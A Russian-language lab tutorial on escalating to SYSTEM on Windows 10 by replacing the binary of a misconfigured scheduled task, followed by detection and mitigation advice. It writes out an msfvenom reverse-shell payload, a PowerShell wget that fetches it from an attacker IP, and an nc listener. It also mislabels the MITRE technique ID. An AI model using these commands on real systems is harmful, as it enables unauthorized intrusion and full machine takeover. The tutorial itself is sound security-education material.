Здравствуйте, дорогие друзья. Сегодня поговорим о повышении привилегий в Windows, при помощи планировщика задач.
Злоумышленник может использовать планировщик задач Windows для планирования первоначального или периодического запуска вредоносных программ. В целях устойчивости, злоумышленник может использовать планировщик задач Windows, для запуска приложений при запуске системы или по расписанию. Кроме того, планировщик задач Windows можно использовать для удаленного выполнения кода для запуска процесса в контексте указанной учетной записи для повышения привилегий.
Содержание
· Диспетчер задач
· Неправильно настроено запланированное задание
· Предварительное условие
· Настройка лаборатории
· Злоупотребление запланированной задачей/заданием
· Обнаружение
· Смягчение
Диспетчер задач
Автоматическое задание можно запланировать с помощью службы планировщика задач. Используя эту услугу, Вы можете настроить запуск любой программы в наиболее подходящую для Вас дату и время. Планировщик задач проверяет указанные Вами критерии времени или события, а затем запускает задачу, когда эти условия выполняются.
Неправильно настроено запланированное задание
Злоумышленник может произвести выполнение, сохранение или повышение привилегий, злоупотребляя любым скриптом, программой или службой, которые автоматически запускаются, через планировщик задач.
Mitre ID: T1573.005 (https://attack.mitre.org/techniques/T1053/005/)
Тактика: Повышение привилегий.
Платформы: Windows
Предварительное условие
Целевая машина: Windows 10.
Машина злоумышленника: Kali Linux
Условие: скомпрометируйте целевую машину с низким уровнем привилегий, используя Metasploit, Netcat и т. д.
Цель: повысить привилегии NT Authority/SYSTEM для пользователя с низкими привилегиями, используя запланированное задание.
Настройка лаборатории
Запустите планировщик задач из меню программы.
Шаг 1.Изучите библиотеку расписания задач, чтобы создать новую задачу.
Шаг 2.Назначьте задачу вошедшему в систему пользователю для выполнения с наивысшими привилегиями.
Шаг 3.Выберите параметр «Триггер», чтобы инициировать запланированную задачу/задание.
Шаг 4. Здесь мы запланировали повторение задачи.
Шаг 5. Когда Вы создаете задачу, то должны указать действие, которое произойдет при запуске Вашей задачи.
Шаг 6.Укажите тип действия, которое будет выполняться запланированной задачей. Например, запланируйте резервное копирование системы с помощью какой-нибудь исполняемой программы.
Шаг 7. Таким образом, запланированные задачи будут запускаться каждый день, в определенное время, для резервного копирования или запланированного задания, которое будет определено как действие.
Злоупотребление запланированной задачей/заданием
Шаг 8. Злоумышленник может повысить привилегии, воспользовавшись запланированной задачей/заданием. После первоначальной точки опоры мы можем запросить список запланированной задачи.
schtasks /query /fo LIST /V
Это помогает атаке понять, какое приложение в какое время подключено к выполнению задания.
Чтобы получить обратную оболочку в виде NT Authority SYSTEM, давайте создадим вредоносный exe-файл, который можно будет запустить с помощью запланированного задания. Используя Msfvenom, мы создали exe-файл, который был внедрен в целевую систему.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
Чтобы злоупотребить запланированной задачей, злоумышленник либо изменит приложение, перезаписав его, либо заменит исходный файл дубликатом. Чтобы вставить дубликат файла в тот же каталог, мы переименовываем исходный файл в file.bak.
Затем в ту же директорию с помощью команды wget загрузим вредоносный файл .exe.
powershell wget 192.168.1.3/shell.exe –o file.exe
Как только дубликат файла file.exe будет добавлен в тот же каталог, файл file.exe будет запущен автоматически, через планировщик задач. Злоумышленники следят за тем, чтобы прослушиватель netcat находился в режиме прослушивания для получения обратного соединения для привилегированной оболочки.
nc -lvp 8888
whoami /priv
Обнаружение
1. Такие инструменты, как Sysinternals Autoruns (https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns), могут обнаруживать системные изменения, например, показывать запланированные на данный момент задания.
2. Такие инструменты, как TCPView (https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview) и Process Explore (https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer), могут помочь выявить удаленные соединения для подозрительных служб или процессов.
3. Просмотр свойств и истории задачи: просмотр свойств и истории задачи с помощью командной строки.
Schtasks/Query/FO LIST/V
4. Включите конфигурацию «Microsoft-Windows-TaskScheduler/Operational», внутри службы регистрации событий, чтобы сообщать о создании и обновлениях запланированных задач.
Mitigation
1. Выполните контрольное сканирование, чтобы выявить неделю или неправильную настройку с помощью автоматического сценария, с использованием таких инструментов, как WinPeas, SharpUp и т. д.
2. Убедитесь, что запланированное задание не должно запускаться как СИСТЕМА.
Настройте запланированные задачи для выполнения от имени учетной записи, прошедшей проверку подлинности, а не от имени СИСТЕМЫ. Соответствующий раздел реестра находится по адресу HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl
Этот параметр можно настроить с помощью объекта групповой политики: Конфигурация компьютера > [Политики] > Настройки Windows > Параметры безопасности > Локальные политики > Параметры безопасности: Контроллер домена: разрешить операторам сервера планировать задачи, значение отключено.
Ссылка: